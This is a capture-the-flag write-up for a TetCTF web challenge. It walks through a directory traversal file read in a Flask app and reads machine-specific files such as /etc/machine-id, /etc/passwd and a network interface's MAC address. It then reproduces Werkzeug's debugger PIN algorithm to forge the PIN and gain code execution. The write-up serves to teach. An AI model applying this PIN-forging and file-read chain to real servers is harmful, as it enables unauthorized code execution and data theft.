This was a fun one. We start off with a web page and get a foothold with an arbitrary file read vulnerability, and end it off with a Python Flask Arbitrary Code Execution in the web debugger.

On the webpage, we are presented with a hyperlink with the text Read some oracle here. Clicking the hyperlink brings us to 5 web pages /read/oracle/[1-5].txt. One of them, 1.txt, says the following:

Flag is in random folder at /, but what is it name? Who know 🤷‍♂️ Can you help me? (This is not brute/guess challenge...) !

We try to see if we can get to other files by changing the URL to something else (try 0.txt), and we get a Flask debugger error page. In it, we see the directory the app lives in, /home/web3_user/app.py. Let's see what would happen if we change the URL to that. We set the URL to /read/app.py. We get the following Python code:

from flask import Flask
from flask import render_template
import random

app = Flask(__name__)

@app.route('/')
def index():
	rand = str(random.randint(1, 5))
	return render_template('index.html', random=rand)

@app.route('/read/<path:filename>')
def read(filename=None):
	rand = str(random.randint(1, 5))

	try:
		content = open(filename, 'r').read()
	except:
		raise
	return render_template('file.html', filename=content, random=rand)

if __name__ == '__main__':
	app.run(host='0.0.0.0', port='7004', debug=True)

To read files with directory traversal, substitute your / with the URL encoded equivalent %2f. Reading /etc/passwd would just be a get request to /read/..%2f..%2fetc%2fpasswd (remember that we are in /home/web3_user/).

As you can see, debug mode is on. This means that whenever an error occurs, an interactive console can be toggled and let you input code (a.k.a. Flask debugger page mentioned above). The caveat is that it is secured with a PIN that is only displayed in the stdout when you run the server. This PIN is not generated randomly every time; rather, it uses a bunch of different machine-specific pieces of information to generate a PIN. This is the function for generating a PIN. I have taken the liberty to remove the part that checks the environment for a pin.

def get_pin_and_cookie_name(app):
    """Given an application object this returns a semi-stable 9 digit pin
    code and a random key.  The hope is that this is stable between
    restarts to not make debugging particularly frustrating.  If the pin
    was forcefully disabled this returns `None`.
    Second item in the resulting tuple is the cookie name for remembering.
    """
    rv = None
    num = None

    modname = getattr(app, "__module__", app.__class__.__module__)

    try:
        # getuser imports the pwd module, which does not exist in Google
        # App Engine. It may also raise a KeyError if the UID does not
        # have a username, such as in Docker.
        username = getpass.getuser()
    except (ImportError, KeyError):
        username = None

    mod = sys.modules.get(modname)

    # This information only exists to make the cookie unique on the
    # computer, not as a security feature.
    probably_public_bits = [
        username,
        modname,
        getattr(app, "__name__", app.__class__.__name__),
        getattr(mod, "__file__", None),
    ]

    # This information is here to make it harder for an attacker to
    # guess the cookie name.  They are unlikely to be contained anywhere
    # within the unauthenticated debug page.
    private_bits = [str(uuid.getnode()), get_machine_id()]

    h = hashlib.md5()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, text_type):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")

    cookie_name = "__wzd" + h.hexdigest()[:20]

    # If we need to generate a pin we salt it a bit more so that we don't
    # end up with the same value and generate out 9 digits
    if num is None:
        h.update(b"pinsalt")
        num = ("%09d" % int(h.hexdigest(), 16))[:9]

    # Format the pincode in groups of digits for easier remembering if
    # we don't have a result yet.
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = "-".join(
                    num[x : x + group_size].rjust(group_size, "0")
                    for x in range(0, len(num), group_size)
                )
                break
        else:
            rv = num

    return rv, cookie_name

Fix the import errors:

from itertools import chain
import sys
import hashlib

You might also notice that the variable text_type is not defined anywhere. Digging a bit deeper in the source code gives us text_type = str if we are using Python 3 (which we are).

There is another function that is referenced: get_machine_id, which gets the machine's ID, regardless of operating system. Using the exploit, we can read the file /etc/os-release to see that we are on an Ubuntu system, so we check the contents of /etc/machine-id and replace the function call with the string d4e6cb65d59544f3331ea0425dc555a1.

We now need to know the username, modname, and whatever uuid.getnode returns. The username is simple. We use the exploit to read /etc/passwd and see that we are probably web3_user. If you call the function now and print the modname, you see that it just says flask.app, so let's assume that it's the same everywhere. This leaves uuid.getnode. We read the documentation and see that it gets the hardware address (MAC address) of the network interface. To do this, we first have to list out all the current network interfaces by reading the file /proc/net/dev. We find the ethernet interface ens3 and read the file /sys/class/net/ens3/address to get the hardware address 56:00:02:7a:23:ac, and convert it into an integer, and then to a string.

We are actually missing one thing. Within get_pin_and_cookie_name there is a variable probably_public_bits. The last item may not be the same as the one on the server, depending on the system you run python on. If we run the function right now and print this variable, the last item would be something similar to /usr/*/python3.x/*-packages/flask/app.py. If you would recall, when we first ran into the error, it output /usr/local/lib/python3.5/dist-packages/flask/app.py. So we simply replace the call to getattr with the previous string, and call the function to get the PIN. If it isn't obvious already, the parameter you call it with is the app.py code you got earlier.

After getting the PIN, we have access to the Werkzeug debugger/interactive console, and thus have ACE. We execute the following code to find the flag:

>>> import os
>>> os.listdir('/')
['media', 'tmp', 'lib', 'swapfile', 'srv', 'usr', 'vmlinuz', 'opt',
'initrd.img.old', 'home', 'bin', 'boot', 'etc', 'lost+found', 'initrd.img',
'root', 'mnt', 'vmlinuz.old', 'dev', 'phao_san_pa_lay___1337', 'sys', 'proc',
'run', 'lib64', 'sbin', 'snap', 'var']
>>> os.listdir('/phao_san_pa_lay___1337')
['flagggg.txt']
>>> open('/phao_san_pa_lay___1337/flagggg.txt').read()
"TetCTF{Flask_Debug_LFI___Wuttt__RCE}\n\nPlease don't do any further action" +
"on the server, we knew the setup suck, but it's needed for the vulnerability\n"